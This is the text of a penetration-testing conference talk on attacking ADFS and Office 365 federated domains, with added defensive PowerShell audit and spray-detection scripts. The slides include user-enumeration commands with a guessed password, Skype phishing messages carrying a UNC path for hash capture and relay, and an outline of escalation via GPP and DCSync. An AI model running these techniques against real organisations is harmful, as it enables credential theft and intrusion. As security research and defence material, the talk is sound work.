Attacking ADFS Endpoints with PowerShell
Karl Fosaaen - @kfosaaen

Active Directory Federation Services (ADFS) has become increasingly popular in the last few years. As a penetration tester, I'm seeing organizations opening themselves up to attacks on ADFS endpoints across the Internet. Manually completing attacks against these endpoints can be tedious. The current native Microsoft management tools are handy, but what if we weaponized them? During this talk, I will show you how to identify domains that support ADFS, confirm email addresses for users of the domain, and help you guess passwords for those users. We'll cover how you can set up your own hosted ADFS domain (on the cheap) and use it to attack other federated domains. On top of that, we'll show you how you can wrap all of the native functionality with PowerShell to automate your attacks. This talk should give penetration testers an overview of how they can start leveraging ADFS endpoints during a penetration test.
https://www.derbycon.com/events/attacking-adfs-endpoints-with-powershell/
2. Introductions
• Who am I?
‒Karl Fosaaen
• What do I do?
‒Wear lots of hats
‒Pen Testing
‒Password Cracking
‒Social Engineering
‒Blog
‒DEF CON Swag Goon
‒Pinball Repair
6. ADFS Overview
Active Directory Federation Services (AD FS)
“is a standards-based service that allows the secure sharing of identity information between trusted business partners (known as a federation) across an extranet.”
Source:
https://msdn.microsoft.com/en-us/library/bb897402.aspx
10. Attack Walkthroughs
• Identifying Federated Endpoints
• Setting Up Your Test Environment
• User Enumeration
• Email Validation and Social Engineering Recon
• Skype Message Phishing
• Dictionary Attacks Against Federated Accounts
• Enumeration of Other Federated Domain Users
• Pivoting to the Internal Network
12. Identifying Federated Endpoints
Side Note:
• Office365 had an Authentication Bypass issue
‒ Insecure SAML assertions
‒ Affected all federated Office365 domains
‒ They called out this method in their blog post
Source:
http://www.economyofmechanism.com/office365-authbypass.html
22. Identifying Federated Endpoints
• What about the top 1 million Alexa sites?
‒ 47,455 (4.7%) of the top 1 Million have “ms=ms*” records
• DNS can be a pain at a million records
*Still better than a million HTTP requests to Microsoft
• Other options
‒ ADFS.domain.com
‒ STS.domain.com
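The same two public DNS hints the talk uses to find federated domains (the Office 365 “MS=ms*” verification TXT record and the adfs./sts. host names) are also the quickest way to see what your own domains advertise. The function below is an added example, not code from the talk or from the NetSPI modules; it uses the Windows Resolve-DnsName cmdlet (DnsClient module) and the domain names passed in are constructed placeholders.

```powershell
# Added example: inventory the federation hints a list of domains you own
# exposes in public DNS. Requires Resolve-DnsName (Windows DnsClient module).
function Get-FederationFootprint {
    param(
        [Parameter(Mandatory)] [string[]] $Domain
    )
    foreach ($d in $Domain) {
        # Office 365 domain-verification record: a TXT value starting "MS=ms"
        $txt = Resolve-DnsName -Name $d -Type TXT -ErrorAction SilentlyContinue |
               Where-Object { $_.Strings -like 'MS=ms*' }

        # Common federation host names called out on the slide
        $adfsHosts = foreach ($prefix in 'adfs', 'sts') {
            $name = "$prefix.$d"
            if (Resolve-DnsName -Name $name -ErrorAction SilentlyContinue) { $name }
        }

        [pscustomobject]@{
            Domain     = $d
            HasMsTxt   = [bool]$txt
            MsTxtValue = ($txt.Strings -join ';')
            AdfsHosts  = ($adfsHosts -join ',')
        }
    }
}

# Constructed domain names; replace with the domains your organization owns.
Get-FederationFootprint -Domain 'example.com', 'example.org' | Format-Table -AutoSize
```

A domain that shows HasMsTxt but no adfs./sts. host is not necessarily safe (the STS can live under any name); the list is a starting inventory of what is discoverable without a single request to Microsoft, which is the point the slide makes about DNS being cheaper than HTTP.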
24. Setting Up Your Test Environment
• Basic Overview
‒ Buy/Have a domain
‒ Set up/Purchase Skype for Business*
‒ Install Skype for Business Client*
‒ Install Lync 2013 SDK*
‒ Get the NetSPI PowerShell Modules
‒ Install Azure AD PowerShell module
*Note: This is only needed for testing federated Skype for Business
26. Setting Up Your Test Environment
• Get hosted Office365 services
‒ Or set up your own server
27. Setting Up Your Test Environment
• Add your domain to the Office365 portal
28. Setting Up Your Test Environment
• Set up your user and enable federation
29. Setting Up Your Test Environment
• Install Skype for Business and the Lync SDK
‒ Requires Visual Studio 2010 for the easiest install
https://www.microsoft.com/en-us/download/details.aspx?id=36824
30. Setting Up Your Test Environment
• Login to Skype for Business as your user
31. Setting Up Your Test Environment
• Grab the PowerShell modules from NetSPI
• https://github.com/NetSPI/PowerShell/blob/master/PowerSkype.ps1
• https://github.com/NetSPI/PowerShell/blob/master/Get-ADFSEndpoint.ps1
32. Setting Up Your Test Environment
• Install the Azure AD PowerShell Module
• https://msdn.microsoft.com/en-us/library/azure/jj151815(v=azure.98).aspx
34. User Enumeration
• We have:
‒ Some Targets/Endpoints
‒ A testing environment
• We need:
‒ Some users to attack
• Enumerate some users for the organization off of LinkedIn
• Use one of the many recon frameworks
• Check out the User enumeration work that
nyxgeek spoke about on Friday
42. Email Validation and SE Recon
• What about the top 1 million Alexa sites?
• Of those 47,455 “ms=ms*” records
‒ 45 have “Administrator” accounts that have federated Skype for Business accounts
‒ None of those were actively online during testing…
‒ From nyxgeek:
• 38,658 (3.8%) have hostname http://lyncdiscover.domain.com
• 486 of 995 unique (Fortune 1000 - 2015) domain names
• Note:
‒ Skype doesn’t like opening 2,000+ conversations at a time
48. Email Validation and SE Recon
Demo
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "\\192.168.1.123\test"
• Invoke-SendSkypeMessage -email karl.fosaaen@netspi.com -message "www.microsoftsupport.online"
• SMB capture/relay running on internal network
• UNC works on internal, HRefs work for external
• Send this message out to a group, get or relay hashes
49. Skype Message Phishing
• Further Work
‒ Grab a domain's worth of phone numbers
• Got this working while making these slides…
• Should work if you already have creds
‒ Brute-Forcing Skype Creds
• Not easy with the Lync SDK
• Nyxgeek has some great methods that will be
added to PowerSkype
56. Enumeration of Other Domain Users
• Not totally necessary, but it can be handy
1. $msolcred = Get-Credential
2. Connect-MsolService -Credential $msolcred
3. Get-MsolUser -All | ft -AutoSize
• This also works for apps using AzureAD for account management
58. Enumeration of Other Domain Users
• Using the Graph API
$token = Get-GraphAPIToken -TenantName DOMAIN_GOES_HERE
Get-GraphData -Token $token -Tenant DOMAIN_GOES_HERE -Resource users
‒ This works for federated and managed domains
• Github – https://github.com/NetSPI/PowerShell/blob/master/Get-GraphAPIToken.ps1
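Both enumeration paths on these slides (Get-MsolUser -All and the Graph users resource) work because, by default, any member of the tenant may read the whole directory, and a federated domain additionally trusts whatever STS it was federated to. The function below is an added example, not part of the talk or the NetSPI modules, showing the tenant-side settings a defender would check against that. It assumes an existing Connect-MsolService session with an administrative account (the MSOnline module the slides install).

```powershell
# Added example: tenant-side review of what makes directory enumeration cheap.
# Assumes Connect-MsolService has already been run with an admin account.
function Get-TenantEnumerationExposure {
    # Verified domains whose sign-in is delegated to an external STS
    $federated = Get-MsolDomain | Where-Object { $_.Authentication -eq 'Federated' }

    # For each one, record which issuer and sign-in URL the tenant trusts so an
    # unexpected STS stands out during review
    $trusts = foreach ($d in $federated) {
        $fs = Get-MsolDomainFederationSettings -DomainName $d.Name
        [pscustomobject]@{
            Domain          = $d.Name
            IssuerUri       = $fs.IssuerUri
            PassiveLogOnUri = $fs.PassiveLogOnUri
        }
    }

    # Can an ordinary member list every other user (the Get-MsolUser -All case)?
    $company = Get-MsolCompanyInformation

    [pscustomobject]@{
        FederatedDomains       = ($federated.Name -join ',')
        FederationTrusts       = $trusts
        UsersCanReadOtherUsers = $company.UsersPermissionToReadOtherUsersEnabled
    }
}

$exposure = Get-TenantEnumerationExposure
$exposure | Format-List
$exposure.FederationTrusts | Format-Table -AutoSize

# Tightening: members can no longer enumerate the directory; admins are unaffected.
if ($exposure.UsersCanReadOtherUsers) {
    Set-MsolCompanySettings -UsersPermissionToReadOtherUsersEnabled $false
}
```

Turning off UsersPermissionToReadOtherUsersEnabled blunts the single-guessed-account enumeration shown above, but applications that rely on member directory reads (address books, some line-of-business apps) need to be tested first; the federation trust list is the concrete check behind the later “Limit federation to trusted domains” mitigation.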
61. Enumeration of Other Domain Users
• Use Exchange online for non-MS managed domains
• If the domain uses Office365, you can connect to it with PowerShell
62. Enumeration of Other Domain Users
• Use Exchange online for non-MS managed domains (1/2)
$PWord = ConvertTo-SecureString -String 'Summer2016' -AsPlainText -Force
$credentials = New-Object -TypeName "System.Management.Automation.PSCredential" -ArgumentList "test@example.com", $PWord
63. Enumeration of Other Domain Users
• Use Exchange online for non-MS managed domains that have OWA tied to O365 (2/2)
Invoke-Command `
  -ConfigurationName Microsoft.Exchange `
  -ConnectionUri https://outlook.office365.com/powershell-liveid/ `
  -Credential $credentials `
  -Authentication Basic -AllowRedirection `
  -ScriptBlock { Get-Recipient -ResultSize unlimited } |
  Export-Csv c:\temp\email_users.csv -NoTypeInformation
66. Pivoting to the Internal Network
• Single Factor VPN Example
‒ Enumerated user emails on LinkedIn
‒ Guessed passwords against MSOnline with PowerShell
‒ Enumerated VPN interfaces
‒ Logged in with guessed credentials
‒ GPP -> Local admin on DA system
‒ DCSync
• “Store passwords using reversible encryption”
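The last link in that chain, DCSync handing back plaintext because “Store passwords using reversible encryption” was on, is something an AD admin can find before an attacker does. The function below is an added example (not from the talk) that reports the three places the setting can come from, together with the domain password policy values that decide how far the password guessing earlier in the chain gets. It assumes the ActiveDirectory RSAT module on a domain-joined host.

```powershell
# Added example: audit reversible password storage and the domain password
# policy. Requires the ActiveDirectory module (RSAT) on a domain member.
Import-Module ActiveDirectory

function Get-ReversibleEncryptionExposure {
    # 1. Domain-wide default policy (Default Domain Policy GPO)
    $default = Get-ADDefaultDomainPasswordPolicy

    # 2. Fine-grained password policies can enable it for a subset of users
    $fgpp = Get-ADFineGrainedPasswordPolicy -Filter * |
            Where-Object { $_.ReversibleEncryptionEnabled }

    # 3. Per-account flag: ENCRYPTED_TEXT_PWD_ALLOWED (0x80) in userAccountControl
    $users = Get-ADUser -LDAPFilter '(userAccountControl:1.2.840.113556.1.4.803:=128)'

    [pscustomobject]@{
        DefaultPolicyReversible = $default.ReversibleEncryptionEnabled
        MinPasswordLength       = $default.MinPasswordLength
        ComplexityEnabled       = $default.ComplexityEnabled
        LockoutThreshold        = $default.LockoutThreshold   # 0 = no lockout
        FgppWithReversible      = ($fgpp.Name -join ',')
        AccountsWithReversible  = ($users.SamAccountName -join ',')
    }
}

Get-ReversibleEncryptionExposure | Format-List
```

Clearing the setting is not enough on its own: a password stored reversibly stays retrievable until that account's next password change, so any account the audit lists needs a reset after the policy is fixed. A LockoutThreshold of 0 is the other value worth acting on, since it is what lets the MSOnline guessing step run unbounded against the same accounts.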
67. Pivoting to the Internal Network
• Other Routes
‒ Single Factor Services
• Management Protocols
• RDP
• SSH
• Sharepoint
• Terminal Services – Web Based
• Citrix
• VDI
• Etc.
68. Pivoting to the Internal Network
• Malicious OneDrive Documents
‒ Can’t use macros in the online version of excel
69. Pivoting to the Internal Network
• Malicious SharePoint Documents
‒ Same concept as OneDrive, just a different platform
‒ Backdoor a document
‒ Edit pages
70. Pivoting to the Internal Network
• Send messages from OWA or Skype for
Business
‒ Autodiscover is handy
‒ People will trust their co-workers
• “Can you look over this word doc for me?”
71. Pivoting to the Internal Network
• Attacking Email Accounts
‒ If Autodiscover is enabled, adding an account can be done from anywhere
‒ Email is interesting, but I’d like a shell
‒ This cannot be done programmatically with PowerShell (*easily)
‒ “Malicious Outlook Rules”
• Nick Landers – Silent Break Security
‒ “MAPI over HTTP and Mailrule Pwnage”
• Etienne - sensepost
74. Attack Mitigations
• Limit federation to trusted domains
• Limit exposed services surface area
• Monitor your Federated and Azure endpoints
• Enforce strong password requirements
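“Monitor your Federated and Azure endpoints” is the mitigation that catches the dictionary attacks described earlier, because a spray against a sign-in endpoint looks nothing like a user mistyping a password: one source address touches many distinct accounts, a few attempts each, in a short window. The function below is an added example (not from the talk) that applies that rule to an exported sign-in log. The records are constructed; a real run would feed Azure AD sign-in or ADFS audit exports with the same four columns, and the thresholds are assumptions to tune for the tenant.

```powershell
# Added example: flag password spraying in exported sign-in records.
# The CSV below is constructed sample data, not a real log.
$sampleCsv = @'
Time,User,SourceIp,Result
2016-09-23T10:00:01Z,alice@example.com,203.0.113.5,Failure
2016-09-23T10:00:03Z,bob@example.com,203.0.113.5,Failure
2016-09-23T10:00:05Z,carol@example.com,203.0.113.5,Failure
2016-09-23T10:00:07Z,dave@example.com,203.0.113.5,Failure
2016-09-23T10:00:09Z,erin@example.com,203.0.113.5,Success
2016-09-23T10:05:00Z,alice@example.com,198.51.100.7,Failure
2016-09-23T10:05:30Z,alice@example.com,198.51.100.7,Failure
2016-09-23T10:06:00Z,alice@example.com,198.51.100.7,Success
'@

function Find-PasswordSpray {
    param(
        [Parameter(Mandatory)] $Records,
        [int] $MinDistinctUsers = 4,   # assumption: raise for large tenants
        [int] $WindowMinutes    = 10   # assumption: width of the detection window
    )
    # A spray spreads one or two passwords across many accounts, so the signal
    # is many distinct users failing from one source within a short window.
    $Records |
        Where-Object { $_.Result -eq 'Failure' } |
        Group-Object SourceIp |
        ForEach-Object {
            $ip     = $_.Name
            $sorted = $_.Group | Sort-Object { [datetime]$_.Time }
            $start  = [datetime]$sorted[0].Time
            $inWin  = @($sorted | Where-Object {
                          ([datetime]$_.Time - $start).TotalMinutes -le $WindowMinutes })
            $users  = @($inWin | Select-Object -ExpandProperty User -Unique)

            if ($users.Count -ge $MinDistinctUsers) {
                # Accounts that later succeeded from the same source are the
                # ones to reset first: they are most likely guessed.
                $guessed = @($Records |
                    Where-Object { $_.SourceIp -eq $ip -and $_.Result -eq 'Success' } |
                    Select-Object -ExpandProperty User -Unique)
                [pscustomobject]@{
                    SourceIp          = $ip
                    DistinctUsersHit  = $users.Count
                    WindowStart       = $start
                    SucceededAccounts = ($guessed -join ',')
                }
            }
        }
}

$records = $sampleCsv | ConvertFrom-Csv
# With the sample data, 203.0.113.5 is reported (4 distinct users, erin succeeded);
# 198.51.100.7 is not, since repeated failures on one account is the case a
# lockout threshold already handles.
Find-PasswordSpray -Records $records | Format-Table -AutoSize
```

Because a spray keeps per-account attempts below the lockout threshold, the distinct-user count per source is the figure to alert on, not failures per account; that is why the page's “Enforce strong password requirements” and this monitoring belong together rather than as alternatives.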
75. Thanks!
• My NetSPI Co-workers
‒ QA/Ideas/Suggestions
• My NetSPI Management Team
‒ For giving me time to work on this
• Jared Bird - @jaredbird
‒ For asking me about federation years ago